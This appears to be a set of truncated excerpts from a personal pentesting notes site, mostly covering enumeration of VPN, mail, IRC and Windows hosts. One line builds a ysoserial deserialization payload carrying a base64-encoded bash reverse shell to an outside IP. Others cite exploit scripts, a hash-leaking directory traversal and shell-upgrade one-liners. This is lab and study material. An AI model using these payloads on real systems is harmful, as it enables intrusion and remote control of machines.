IKE is used on VPN servers on UDP 500. Test a server with ike-scan -M $target Example output: SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify PSK means that a preshared key is used. 1 returned handshake, 0, returned notify means that…
What to do if all ports seemed to be closed? Open Wireshark and monitor it during a full TCP scan Scan also all UDP ports Filter in Wireshark where the target connected back to you. Port knocking? Can you trigger the server via a third-party? Or does it change a behviour time-based?
Enumeration See Oracle article
If you can provide a serialized (.ser) file, try to create a payload directly, if you have the source code, or just use a yoserial payload. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser // Prepare a reverse shell command line an transform it into b64. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"…
File and directory integrity levels C:\Users\User>icacls hallo hallo NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) WINDEV2012EVAL\User:(I)(F) Mandatory Label\High Mandatory Level:(NW) (I)(F) means that the corresponding user or group has (F) Full permission on the file and that the permissions are inherited from the parent = directory. Note that the Read right ® also enables execution on that file! (There…
Should exploit /tmp/18650.py not work, use svwar ‑m INVITE ‑e100-500 10.10.10.7 to determine the proper extension id.
Pentesters love 0days and cool exploits. “There are FAR more misconfigurations than vulns.” “Vulns will be detected and patches by Nessus, Nexpose, etc.” “Misconfigurations typically are missed by scanners.” “You want to increase security? Go to your boss and change the job descriptions of admins to include confidentialty and integrity. That matters more than anything else.” “If you…
Various Show who else is logged in. qwinsta Open the Event Viewer and search in the looks. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports with the previous found ones! netstat -ano Check the ARP cache…
Determine if the system has the WSL with bash: where /R C:\windows bash.exe If bash.exe is there and the WSL is running, then commands can be run as root (!) like: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami Install the WSL To install the WSL, a system shell is required unfortunatelly. See this article for installation.
Version 8 has an interesting vulnerability. Directory traversal with multiple/remote/14641.py reveals a SHA1 password hash. In the publicly available login page, the salt can be accessed and added to the hash:console.log(hex_hmac_sha1(document.loginform.salt.value, ‘2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03’));
Dumpzilla Extracts the content of a profile directory. Download the profile directory. See what we have:dumpzilla 84p8ofq6.default --Summary Use the modules to see details.
Enumeration Mandatory Enumerate with nmapnmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 $target Connect and get version informationtelnet $target 6697USER duperuser4242 0 * duperuser4242NICK duperuser4242VERSIONINFOHELP Optional
Example: # telnet $target 110 Trying 10.10.10.51… Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS root +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows ...
Enumeration Mandatory Grab bannertelnet $target 119 Enumerate with nmapnmap -p 119 --script nntp-ntlm-info $target Optional
See POP3.
Enumeration Mandatory Grab bannertelnet $target 110openssl s_client -connect $target:995 -crlf -quiet In case of issues, see the openssl article. Search for exploits. If you have credentials, log in and read the emails. Optional
Login Bevor login, convert username and password into base64. (!) Use telnet — nc sometimes does not work and does not return the server’s response! HELO mynameAUTH LOGINcm9vdAo= // username in base64334 Server reponds with base64 stringcm9vdAo= // password in base64235 ok // success
See SMTP article
Shows all process in a wide consoleps auxww sudo = doas
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';